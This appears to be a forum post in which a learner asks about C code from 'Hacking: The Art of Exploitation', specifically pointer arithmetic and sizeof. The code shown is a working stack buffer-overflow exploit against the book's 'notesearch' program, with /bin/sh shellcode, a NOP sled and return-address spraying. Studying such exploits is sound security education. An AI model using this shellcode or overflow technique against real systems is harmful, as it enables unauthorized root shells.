Welcome to HBH! If you have tried to register and didn't get a verification email, please using the following link to resend the verification email.

Help me understand this c code please?

  1. Home
  2. Forum
  3. Programming
  4. Help me understand this c code please?

Infam0us's Avatar

Infam0us

Member
0 0

Hi, I am reading a book called "Hacking: the art of exploitation" and Im about a quarter of the way through it and I come into a program he wrote to exploit a program he wrote earlier in the book. I understand most of the code he is good at explaining it but I'm stuck with a few questions that I can't seem to find the answer to.

Here is the code:

 #include<stdlib.h> 
 #include<string.h>

char shellcode[]=
"\x31\xc0\x31\xdb\x31\xc9\x99\xb0\xa4\xcd\x80\x6a\x0b\x58\x68"
"\x2f\x2f\x73\x68\x2f\x62\x69\x6e\x89\xe3\x51\x89\xe2\x53\x89"   
"\xe1\xcd\x80";

int main(int argc, char *argv[]) {
unsigned int i, *ptr, ret, offset=270;
char *command, *buffer;

command = (char *) malloc(200);
bzero(command, 200); //Zero out the new memory.

strcpy(command, "./notesearch \' " ); // Start the command buffer.
buffer = command + strlen(command); //Set buffer at the end.


if(argc > 1) // Set offset.
offset = atoi(argv[1]);

ret = (unsigned int) &i - offset;  // Set return address.

for(i=0; i < 160; i+=4) // Fill buffer with return address.
*((unsigned int *)(buffer+i)) = ret;

memset(buffer, 0x90, 60); // Build NOP sled.
memcpy(buffer+60, shellcode, sizeof(shellcode)-1);

strcat(command, "\' " );

system(command); // Run exploit.
free(command);

}```  

My questions about this code are the following :


1) ```markupbuffer = command + strlen(command);``` 
This is a very confusing line of code to me, I thought that buffer was a char pointer? Is this supposed to set buffer equal to "./notesearch \'" + 15?  What does buffer = after that statement?  In the note he says "set the buffer at the end"  **what does he mean by set a buffer?**

 
2-3) EDIT: feel stupid for even asking these, guess i was more tired then i thought..

```markupmemcpy(buffer+60, shellcode, sizeof(shellcode)-1);```

4) I get the copy shellcode into buffer+60, but here "sizeof(shellcode)-1" 
EDIT : why the minus 1?

Thanks very very verry much for the help definitely appreciated :happy: